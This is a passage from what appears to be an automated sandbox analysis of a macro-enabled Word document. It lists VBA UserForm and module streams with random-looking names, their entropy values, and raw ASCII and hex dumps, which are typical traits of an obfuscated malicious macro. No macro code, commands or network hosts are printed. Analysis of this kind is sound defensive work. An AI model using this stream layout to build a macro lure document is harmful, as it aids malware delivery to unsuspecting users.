                                            Keyword
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            False
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: UserForm2, Stream Size: 1155
                                            General
                                            Stream Path:Macros/VBA/UserForm2
                                            VBA File Name:UserForm2
                                            Stream Size:1155
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 a8 f8 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: UserForm3, Stream Size: 1159
                                            General
                                            Stream Path:Macros/VBA/UserForm3
                                            VBA File Name:UserForm3
                                            Stream Size:1159
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . ^ I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 5e 49 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VB_GlobalNameSpace
                                            VBA Code
                                            VBA File Name: UserForm4, Stream Size: 1160
                                            General
                                            Stream Path:Macros/VBA/UserForm4
                                            VBA File Name:UserForm4
                                            Stream Size:1160
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . W . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 57 91 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VB_Base
                                            VBA Code
                                            VBA File Name: UserForm5, Stream Size: 1160
                                            General
                                            Stream Path:Macros/VBA/UserForm5
                                            VBA File Name:UserForm5
                                            Stream Size:1160
                                            Data ASCII:. . . . . . . . . @ . . . . . . . L . . . . . . . G . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 40 03 00 00 d4 00 00 00 4c 02 00 00 ff ff ff ff 47 03 00 00 9b 03 00 00 00 00 00 00 01 00 00 00 11 c0 f9 39 00 00 ff ff 01 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            False
                                            VB_Exposed
                                            Attribute
                                            VB_Name
                                            VB_Creatable
                                            VB_PredeclaredId
                                            VB_GlobalNameSpace
                                            VB_Base
                                            VB_Customizable
                                            VB_TemplateDerived
                                            VBA Code
                                            VBA File Name: Vhr7vb1s1hgs, Stream Size: 681
                                            General
                                            Stream Path:Macros/VBA/Vhr7vb1s1hgs
                                            VBA File Name:Vhr7vb1s1hgs
                                            Stream Size:681
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . # . . . w . . . . . . . . . . . . . . ] . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 77 02 00 00 00 00 00 00 01 00 00 00 11 c0 94 5d 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                            VBA Code Keywords

                                            Keyword
                                            Attribute
                                            VB_Name
                                            VBA Code

                                            Streams

                                            Stream Path: \x1CompObj, File Type: data, Stream Size: 114
                                            General
                                            Stream Path:\x1CompObj
                                            File Type:data
                                            Stream Size:114
                                            Entropy:4.2359563651
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . F . . . M i c r o s o f t W o r d 9 7 - 2 0 0 3 D o c u m e n t . . . . . M S W o r d D o c . . . . . W o r d . D o c u m e n t . 8 . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 06 09 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 20 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 57 6f 72 64 20 39 37 2d 32 30 30 33 20 44 6f 63 75 6d 65 6e 74 00 0a 00 00 00 4d 53 57 6f 72 64 44 6f 63 00 10 00 00 00 57 6f 72 64 2e 44 6f 63 75 6d 65 6e 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096
                                            General
                                            Stream Path:\x5DocumentSummaryInformation
                                            File Type:data
                                            Stream Size:4096
                                            Entropy:0.252421588676
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , . . 0 . . . . . . . . . . . . . . . h . . . . . . . p . . . . . . . | . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 e8 00 00 00 0c 00 00 00 01 00 00 00 68 00 00 00 0f 00 00 00 70 00 00 00 05 00 00 00 7c 00 00 00 06 00 00 00 84 00 00 00 11 00 00 00 8c 00 00 00 17 00 00 00 94 00 00 00 0b 00 00 00 9c 00 00 00 10 00 00 00 a4 00 00 00 13 00 00 00 ac 00 00 00
                                            Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 496
                                            General
                                            Stream Path:\x5SummaryInformation
                                            File Type:data
                                            Stream Size:496
                                            Entropy:3.89869601257
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . . . + ' . . 0 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . p . . . . . . . X . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . @ . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . . . 0 . . . . . . . 8 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . N o r m a l . d o t m .
                                            Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c0 01 00 00 11 00 00 00 01 00 00 00 90 00 00 00 02 00 00 00 98 00 00 00 03 00 00 00 70 01 00 00 04 00 00 00 58 01 00 00 05 00 00 00 a4 00 00 00 06 00 00 00 b0 00 00 00 07 00 00 00 bc 00 00 00 08 00 00 00 40 01 00 00 09 00 00 00 d0 00 00 00
                                            Stream Path: 1Table, File Type: data, Stream Size: 7231
                                            General
                                            Stream Path:1Table
                                            File Type:data
                                            Stream Size:7231
                                            Entropy:5.85333738879
                                            Base64 Encoded:True
                                            Data ASCII:. . . . . . . . s . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . v . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . > . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . . 6 . . .
                                            Data Raw:0a 06 0f 00 12 00 01 00 73 01 0f 00 07 00 03 00 03 00 03 00 00 00 04 00 08 00 00 00 98 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 9e 00 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 36 06 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00 76 02 00 00
                                            Stream Path: Data, File Type: data, Stream Size: 99195
                                            General
                                            Stream Path:Data
                                            File Type:data
                                            Stream Size:99195
                                            Entropy:7.38970239713
                                            Base64 Encoded:True
                                            Data ASCII:{ . . . D . d . . . . . . . . . . . . . . . . . . . . . / g . , b . r . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . j . . . . . . . . . . . . . . . . . . . c . . . 8 . . . . A . . . . ? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P . i . c . t . u . r . e . . 1 . . . . . " . . . . . . . . . . . . . . . . . . . . . . . R . . . . . . . . . \\ . . . R . o . . . ! # q . . v . . . . . . . . . . D . . . . . S . . F . . . . . . \\ . . . R . o . . . ! # q . . v . . . . . .
                                            Data Raw:7b 83 01 00 44 00 64 00 00 00 00 00 00 00 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 2f 67 eb 2c 62 01 72 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0f 00 04 f0 6a 00 00 00 b2 04 0a f0 08 00 00 00 01 04 00 00 00 0a 00 00 63 00 0b f0 38 00 00 00 04 41 01 00 00 00 3f 01 00 00 06 00 bf 01 00 00 10 00 ff 01 00 00 08 00 80 c3 14 00
                                            Stream Path: Macros/PROJECT, File Type: ASCII text, with CRLF line terminators, Stream Size: 894
                                            General
                                            Stream Path:Macros/PROJECT
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:894
                                            Entropy:5.30543445279
                                            Base64 Encoded:True
                                            Data ASCII:I D = " { 9 E 7 4 B F 6 0 - 7 1 9 9 - 4 B 1 2 - B 7 4 3 - 4 4 A 8 F B E E D 2 3 6 } " . . D o c u m e n t = D k 5 a t t 0 c u _ 9 j s b / & H 0 0 0 0 0 0 0 0 . . P a c k a g e = { A C 9 F 2 F 9 0 - E 8 7 7 - 1 1 C E - 9 F 6 8 - 0 0 A A 0 0 5 7 4 A 4 F } . . B a s e C l a s s = U s e r F o r m 1 . . B a s e C l a s s = U s e r F o r m 2 . . B a s e C l a s s = U s e r F o r m 3 . . B a s e C l a s s = U s e r F o r m 4 . . B a s e C l a s s = U s e r F o r m 5 . . M o d u l e = L x v i n h y q 0 h u 0 i . .
                                            Data Raw:49 44 3d 22 7b 39 45 37 34 42 46 36 30 2d 37 31 39 39 2d 34 42 31 32 2d 42 37 34 33 2d 34 34 41 38 46 42 45 45 44 32 33 36 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 44 6b 35 61 74 74 30 63 75 5f 39 6a 73 62 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 50 61 63 6b 61 67 65 3d 7b 41 43 39 46 32 46 39 30 2d 45 38 37 37 2d 31 31 43 45 2d 39 46 36 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 0d
                                            Stream Path: Macros/PROJECTwm, File Type: data, Stream Size: 278
                                            General
                                            Stream Path:Macros/PROJECTwm
                                            File Type:data
                                            Stream Size:278
                                            Entropy:3.75500935024
                                            Base64 Encoded:False
                                            Data ASCII:D k 5 a t t 0 c u _ 9 j s b . D . k . 5 . a . t . t . 0 . c . u . _ . 9 . j . s . b . . . U s e r F o r m 1 . U . s . e . r . F . o . r . m . 1 . . . U s e r F o r m 2 . U . s . e . r . F . o . r . m . 2 . . . U s e r F o r m 3 . U . s . e . r . F . o . r . m . 3 . . . U s e r F o r m 4 . U . s . e . r . F . o . r . m . 4 . . . U s e r F o r m 5 . U . s . e . r . F . o . r . m . 5 . . . L x v i n h y q 0 h u 0 i . L . x . v . i . n . h . y . q . 0 . h . u . 0 . i . . . V h r 7 v b 1 s 1 h g s . V . h . r .
                                            Data Raw:44 6b 35 61 74 74 30 63 75 5f 39 6a 73 62 00 44 00 6b 00 35 00 61 00 74 00 74 00 30 00 63 00 75 00 5f 00 39 00 6a 00 73 00 62 00 00 00 55 73 65 72 46 6f 72 6d 31 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 31 00 00 00 55 73 65 72 46 6f 72 6d 32 00 55 00 73 00 65 00 72 00 46 00 6f 00 72 00 6d 00 32 00 00 00 55 73 65 72 46 6f 72 6d 33 00 55 00 73 00 65 00 72 00 46 00 6f 00 72
                                            Stream Path: Macros/UserForm1/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm1/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm1/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm1/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.62034133633
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 1 . . C a p t i o n = " U s e r F o r m 1 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 31 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 31 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm1/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm1/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm1/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm1/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/UserForm2/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm2/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm2/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm2/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.62970308443
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 2 . . C a p t i o n = " U s e r F o r m 2 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 32 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 32 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm2/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm2/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm2/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm2/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/UserForm3/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm3/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm3/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm3/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.63438395848
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 3 . . C a p t i o n = " U s e r F o r m 3 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 33 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 33 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm3/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm3/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm3/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm3/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/UserForm4/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm4/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
                                            Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 46 6f 72 6d 73 20 32 2e 30 20 46 6f 72 6d 00 10 00 00 00 45 6d 62 65 64 64 65 64 20 4f 62 6a 65 63 74 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm4/\x3VBFrame, File Type: ASCII text, with CRLF line terminators, Stream Size: 266
                                            General
                                            Stream Path:Macros/UserForm4/\x3VBFrame
                                            File Type:ASCII text, with CRLF line terminators
                                            Stream Size:266
                                            Entropy:4.62402723855
                                            Base64 Encoded:True
                                            Data ASCII:V E R S I O N 5 . 0 0 . . B e g i n { C 6 2 A 6 9 F 0 - 1 6 D C - 1 1 C E - 9 E 9 8 - 0 0 A A 0 0 5 7 4 A 4 F } U s e r F o r m 4 . . C a p t i o n = " U s e r F o r m 4 " . . C l i e n t H e i g h t = 3 0 1 5 . . C l i e n t L e f t = 1 2 0 . . C l i e n t T o p = 4 6 5 . . C l i e n t W i d t h = 4 5 6 0 . . S t a r t U p P o s i t i o n = 1 ' C e n t e r O w
                                            Data Raw:56 45 52 53 49 4f 4e 20 35 2e 30 30 0d 0a 42 65 67 69 6e 20 7b 43 36 32 41 36 39 46 30 2d 31 36 44 43 2d 31 31 43 45 2d 39 45 39 38 2d 30 30 41 41 30 30 35 37 34 41 34 46 7d 20 55 73 65 72 46 6f 72 6d 34 20 0d 0a 20 20 20 43 61 70 74 69 6f 6e 20 20 20 20 20 20 20 20 20 3d 20 20 20 22 55 73 65 72 46 6f 72 6d 34 22 0d 0a 20 20 20 43 6c 69 65 6e 74 48 65 69 67 68 74 20 20 20 20 3d 20
                                            Stream Path: Macros/UserForm4/f, File Type: data, Stream Size: 38
                                            General
                                            Stream Path:Macros/UserForm4/f
                                            File Type:data
                                            Stream Size:38
                                            Entropy:1.54052096453
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . } . . k . . . . . . . . . . . . . . . . . . . . . . . . .
                                            Data Raw:00 04 18 00 00 0c 00 08 00 7d 00 00 6b 1f 00 00 c6 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                            Stream Path: Macros/UserForm4/o, File Type: empty, Stream Size: 0
                                            General
                                            Stream Path:Macros/UserForm4/o
                                            File Type:empty
                                            Stream Size:0
                                            Entropy:0.0
                                            Base64 Encoded:False
                                            Data ASCII:
                                            Data Raw:
                                            Stream Path: Macros/UserForm5/\x1CompObj, File Type: data, Stream Size: 97
                                            General
                                            Stream Path:Macros/UserForm5/\x1CompObj
                                            File Type:data
                                            Stream Size:97
                                            Entropy:3.61064918306
                                            Base64 Encoded:False
                                            Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t F o r m s 2 . 0 F o r m . . . . . E m b e d d e d O b j e c t . . . . . . 9 . q . . . . . . . . . . . .
